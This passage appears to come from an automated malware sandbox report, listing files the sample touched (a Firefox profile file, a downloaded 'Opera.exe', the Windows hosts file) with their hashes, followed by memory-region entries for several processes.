                                                                        27e5368713002724b9fd3e2b1bb55024329d283d891ddc7010f7ca9ce34bb331

                                                                        SHA512

                                                                        e03ce8e07e09bcaae4ff4e8832d9a7fffb0a6c5c46528a3c51fa600ef6fde8a3c5b367ff0c32cc8c3adbffb07ce196f777c4594993310e31eccb054c2ab7c017

                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\targeting.snapshot.json

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        edfba10a9cd8b97095344453d024a733

                                                                        SHA1

                                                                        7a84c2da263b102c2c5b1b7f88cc20a72e8e429d

                                                                        SHA256

                                                                        fa9676ab1a172336bd8228fabf80760d67a3fb505128139e1cef297d802f72dd

                                                                        SHA512

                                                                        b8c12140341493d70cfd0441a480c96125a77a7d6e65ea043191bc2e65a7cfe890e1da0f5c8e12e77a8e6ee8765a1eaa6ed062223b417b7732b95d49c2d60696

                                                                      • C:\Users\Admin\Downloads\Opera.exe

                                                                        Filesize

                                                                        319KB

                                                                        MD5

                                                                        f69924b642ac4b9ef1dfacdfd43759a9

                                                                        SHA1

                                                                        95da50564c7cbc3749148419c68a08b0f2869ee1

                                                                        SHA256

                                                                        d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18

                                                                        SHA512

                                                                        2334511265c507d16b3a323c721a392659feb405a5d9fea588146c4ef320261166312c2fcf8f494c4aa342e0b5a9d5da20576ce2d6ae1e3215ee47dcc19f5e07

                                                                      • C:\Windows\System32\drivers\etc\hosts

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        577f27e6d74bd8c5b7b0371f2b1e991c

                                                                        SHA1

                                                                        b334ccfe13792f82b698960cceaee2e690b85528

                                                                        SHA256

                                                                        0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9

                                                                        SHA512

                                                                        944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

                                                                      • memory/8-20-0x000001E3D94A0000-0x000001E3D94C2000-memory.dmp

                                                                        Filesize

                                                                        136KB

                                                                      • memory/8-23-0x000001E3D97A0000-0x000001E3D9816000-memory.dmp

                                                                        Filesize

                                                                        472KB

                                                                      • memory/208-93-0x000001F15A930000-0x000001F15A980000-memory.dmp

                                                                        Filesize

                                                                        320KB

                                                                      • memory/208-13-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

                                                                        Filesize

                                                                        9.9MB

                                                                      • memory/208-9-0x000001F140360000-0x000001F1403A0000-memory.dmp

                                                                        Filesize

                                                                        256KB

                                                                      • memory/208-15-0x000001F15A980000-0x000001F15A990000-memory.dmp

                                                                        Filesize

                                                                        64KB

                                                                      • memory/208-94-0x000001F140800000-0x000001F14081E000-memory.dmp

                                                                        Filesize

                                                                        120KB

                                                                      • memory/208-158-0x000001F140820000-0x000001F14082A000-memory.dmp

                                                                        Filesize

                                                                        40KB

                                                                      • memory/208-159-0x000001F142110000-0x000001F142122000-memory.dmp

                                                                        Filesize

                                                                        72KB

                                                                      • memory/208-434-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

                                                                        Filesize

                                                                        9.9MB

                                                                      • memory/404-1556-0x00000277CDD70000-0x00000277CDE70000-memory.dmp

                                                                        Filesize

                                                                        1024KB

                                                                      • memory/404-1532-0x00000277BC690000-0x00000277BC692000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/404-1588-0x00000277CFC00000-0x00000277CFD00000-memory.dmp

                                                                        Filesize

                                                                        1024KB

                                                                      • memory/404-1527-0x00000277BC900000-0x00000277BCA00000-memory.dmp

                                                                        Filesize

                                                                        1024KB

                                                                      • memory/404-1530-0x00000277BC670000-0x00000277BC672000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/404-1534-0x00000277BC6B0000-0x00000277BC6B2000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/1116-11-0x0000000000400000-0x0000000000457000-memory.dmp

                                                                        Filesize

                                                                        348KB

                                                                      • memory/1788-1484-0x0000024481600000-0x0000024481610000-memory.dmp

                                                                        Filesize

                                                                        64KB

                                                                      • memory/1788-1503-0x0000024485860000-0x0000024485862000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/1788-1468-0x0000024481500000-0x0000024481510000-memory.dmp

                                                                        Filesize

                                                                        64KB

                                                                      • memory/2340-1608-0x0000029A238C0000-0x0000029A239C0000-memory.dmp

                                                                        Filesize

                                                                        1024KB

                                                                      • memory/2340-1645-0x0000029A34C50000-0x0000029A34D50000-memory.dmp

                                                                        Filesize

                                                                        1024KB

                                                                      • memory/3172-1192-0x00000000011B0000-0x00000000011BA000-memory.dmp

                                                                        Filesize

                                                                        40KB

                                                                      • memory/3172-1405-0x000000001B560000-0x000000001B572000-memory.dmp

                                                                        Filesize

                                                                        72KB

                                                                      • memory/3172-14-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

                                                                        Filesize

                                                                        9.9MB

                                                                      • memory/3172-1170-0x000000001B4B0000-0x000000001B53E000-memory.dmp

                                                                        Filesize

                                                                        568KB

                                                                      • memory/3172-475-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

                                                                        Filesize

                                                                        9.9MB

                                                                      • memory/3172-12-0x0000000000A70000-0x0000000000A8A000-memory.dmp

                                                                        Filesize

                                                                        104KB

                                                                      • memory/3172-1161-0x00000000010E0000-0x00000000010EC000-memory.dmp

                                                                        Filesize

                                                                        48KB

                                                                      • memory/4892-1660-0x0000023CBF630000-0x0000023CBF632000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/4892-1657-0x0000023CBFD00000-0x0000023CBFE00000-memory.dmp

                                                                        Filesize

                                                                        1024KB

                                                                      • memory/4892-1666-0x0000023CBF6F0000-0x0000023CBF6F2000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/4892-1662-0x0000023CBF690000-0x0000023CBF692000-memory.dmp

                                                                        Filesize

                                                                        8KB

                                                                      • memory/5520-1510-0x000002A2B1200000-0x000002A2B1300000-memory.dmp

                                                                        Filesize

                                                                        1024KB

                                                                      • memory/5520-1511-0x000002A2B1200000-0x000002A2B1300000-memory.dmp

                                                                        Filesize

                                                                        1024KB

                                                                      • memory/5520-1512-0x000002A2B1200000-0x000002A2B1300000-memory.dmp

                                                                        Filesize

                                                                        1024KB

                                                                      • memory/5744-849-0x0000000000400000-0x0000000000457000-memory.dmp

                                                                        Filesize

                                                                        348KB